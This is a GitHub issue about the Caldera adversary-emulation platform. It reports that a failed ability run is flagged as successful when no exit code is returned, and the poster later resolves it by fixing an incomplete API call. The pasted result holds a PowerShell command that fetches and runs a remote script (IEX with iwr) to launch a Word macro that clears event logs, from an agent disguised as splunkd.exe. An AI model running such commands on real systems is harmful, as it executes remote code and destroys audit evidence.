You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I am experiencing issues with the way caldera is evaluating whether links/abilities have been successfully executed while no exit_code is available. In my case there is clearly an issue with the command execution yet it gets flagged with a status of 0 (success). Wouldn't it be more logical to add the exit code as a potential discriminator for successful command execution?
Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/
Seems like this issue was caused due to an incomplete API call where I add an ability as a potential link to an operation. Unfortunately there is no default fallback for undefined parameters (e.g. tactic name, technique ID, etc). In my case this resulted in the lack of the atomic parser module. After assigning the value explicitly I got correct readings. For me, given you already require the ability_id it could use these values by default, just like it does if you use the GUI. Issue closed for me.
I am experiencing issues with the way caldera is evaluating whether links/abilities have been successfully executed while no exit_code is available. In my case there is clearly an issue with the command execution yet it gets flagged with a status of 0 (success). Wouldn't it be more logical to add the exit code as a potential discriminator for successful command execution?
{
"ability_metadata": {
"ability_description": "Manual command ability",
"ability_id": "05f8b752dbccff102ef530103bd8e550",
"ability_name": "Clear Event Logs via VBA"
},
"agent_metadata": {
"architecture": "amd64",
"contact": "HTTP",
"created": "2023-07-10T12:51:54Z",
"group": "secops",
"host": "perp-clt-w101",
"location": "C:\Users\Public\splunkd.exe",
"paw": "ddntzl",
"pid": 7024,
"ppid": 5208,
"privilege": "User",
"username": "PERP\kkevin"
},
"agent_reported_time": "2023-07-28T10:08:54Z",
"attack_metadata": {
"tactic": "defense-evasion",
"technique_id": "T1070.001",
"technique_name": "auto-generated"
},
"collected_timestamp": "2023-07-28T12:08:55Z",
"command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"",
"delegated_timestamp": "2023-07-28T12:08:33Z",
"executor": "psh",
"finished_timestamp": "2023-07-28T12:08:59Z",
"operation_metadata": {
"operation_adversary": "ad-hoc",
"operation_name": "TUC00034",
"operation_start": "2023-07-28T12:08:33Z"
},
"output": {
"exit_code": "",
"stderr": "",
"stdout": "Get-Content : Cannot find path 'C:\Users\kkevin\Desktop\PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt' because it does not exist.At line:77 char:22+ $macroCode = Get-Content $macroFile -Raw+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\Users\kkevin...1-macrocode.txt:String) [Get-Content], ItemNotFoundEx ception + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand Exception calling "Run" with "1" argument(s): "Can't run the specified macro"At line:91 char:5+ $app.Run($sub)+ ~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : COMException "
},
"pid": 1636,
"plaintext_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"",
"platform": "windows",
"status": 0
}
The text was updated successfully, but these errors were encountered: